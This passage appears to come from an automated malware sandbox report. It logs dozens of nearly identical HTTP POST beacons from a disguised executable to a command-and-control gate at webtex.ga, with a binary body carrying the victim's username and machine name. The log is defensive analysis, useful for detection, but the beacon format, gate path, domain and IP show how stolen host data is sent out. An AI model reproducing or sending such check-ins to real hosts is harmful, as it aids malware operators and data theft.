                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:59.114182949 CET4799OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:59.154859066 CET4799INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:16 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    219192.168.2.34996247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:59.376610041 CET4800OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:59.393301010 CET4800OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:59.446842909 CET4800INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:16 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    22192.168.2.34973147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:38.904767990 CET96OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:38.921297073 CET96OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:38.965207100 CET96INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:56 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    220192.168.2.34996347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:59.658098936 CET4801OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:59.674897909 CET4802OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:59.717549086 CET4802INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:16 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    221192.168.2.34996447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:59.937166929 CET4803OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:59.953744888 CET4803OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:59.996310949 CET4803INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:17 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    222192.168.2.34996547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:00.213593960 CET4804OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:00.230097055 CET4804OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:00.271773100 CET4805INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:17 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    223192.168.2.34996647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:00.506449938 CET4805OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:00.523019075 CET4806OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:00.568294048 CET4806INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:17 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    224192.168.2.34996747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:00.791546106 CET4807OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:00.808204889 CET4807OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:00.944044113 CET4807INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:18 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    225192.168.2.34996847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:01.165537119 CET4808OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:01.182256937 CET4808OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:01.224257946 CET4809INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:18 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    226192.168.2.34996947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:01.475567102 CET4810OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:01.492468119 CET4810OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:01.535551071 CET4810INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:18 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    227192.168.2.34997047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:01.768613100 CET4811OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:01.786411047 CET4811OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:01.828970909 CET4811INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:19 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    228192.168.2.34997147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:02.064174891 CET4812OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:02.080821037 CET4813OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:02.206245899 CET4813INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:19 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    229192.168.2.34997247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:02.431474924 CET4814OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:02.448327065 CET4814OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:02.490118980 CET4814INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:19 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    23192.168.2.34973447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:39.202320099 CET98OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:39.218918085 CET98OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:39.261558056 CET98INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:56 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    230192.168.2.34997347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:02.710186958 CET4815OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:02.726979971 CET4815OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:02.770838022 CET4816INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:20 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    231192.168.2.34997447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:02.991389036 CET4817OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:03.008039951 CET4817OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:03.052233934 CET4817INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:20 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    232192.168.2.34997547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:03.285552025 CET4818OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:03.302356005 CET4818OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:03.344530106 CET4818INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:20 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    233192.168.2.34997647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:03.554472923 CET4819OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:03.571105003 CET4820OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:03.614420891 CET4820INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:20 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    234192.168.2.34997747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:03.844235897 CET4821OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:03.860785007 CET4821OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:03.907417059 CET4821INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:21 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    235192.168.2.34997847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:04.123665094 CET4822OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:04.140394926 CET4822OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:04.184755087 CET4823INHTTP/1.0 404 Not Found
